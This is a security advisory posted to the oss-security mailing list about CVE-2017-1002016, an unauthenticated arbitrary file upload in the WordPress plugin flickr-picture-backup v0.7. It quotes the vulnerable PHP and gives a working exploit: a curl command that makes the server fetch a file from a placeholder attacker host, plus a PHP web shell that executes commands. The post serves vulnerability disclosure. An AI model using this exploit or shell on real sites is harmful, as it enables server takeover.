Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 30 Apr 2017 12:45:47 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Arbitrary file upload vulnerability in Wordpress plugin
 flickr-picture-backup v0.7

Title: Arbitrary file upload vulnerability in Wordpress plugin flickr-picture-backup v0.7
Author: Larry W. Cashdollar, @_larry0
Date: 2017-04-26
CVE-ID:[CVE-2017-1002016]
Download Site: https://wordpress.org/plugins/flickr-picture-backup/
Vendor: http://daozhao.goflytoday.com/
Vendor Notified: 2017-04-26
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=190
Description: Backup flickr’s picture which in page/post External links to flickr’s picture. 
Vulnerability:
The code in flickr-picture-download.php doesn't check to see if the user is authenticated or that they have permission to upload files.  It also doesn't check what type of file is being uploaded.

define('WP_ADMIN', TRUE);
require_once('../../../wp-load.php');
require_once(ABSPATH . 'wp-admin/includes/admin.php');
//require_once("./flickr-picture-backup.php");
//echo "flickr-picture-download.php";
if($_GET["url"])
{
    $url = $_GET["url"];
    $fl = wp_daozhao_download_flickr_picture($url);
    if ( is_wp_error($fl) )
    {
		echo  "FALSE:" . $fl->get_error_message();
    }
    else
    {
        wp_daozhao_flickr_backupfile_exists($url,$returl);
        echo "OK:" . $returl ;
    }
    //echo wp_daozhao_flickr_backup_urlpath();
    //echo "OK";
}

Export: JSON TEXT XML
Exploit Code:
	• $ curl http://example.com/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php -d "url=http://myhost/shell.php"
	•  
	• Where shell.php is code to print out php web shell code, something like:
	•  
	• <?php
	• echo "<?php\n\$cmd=\$_GET['cmd'];\nsystem(\$cmd);\n?>\n";
	• ?>
	•  
	• Upon exploitation your shell is in:
	•  
	• http://example.com/wp-content/uploads/flickr_backup/shell.php

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ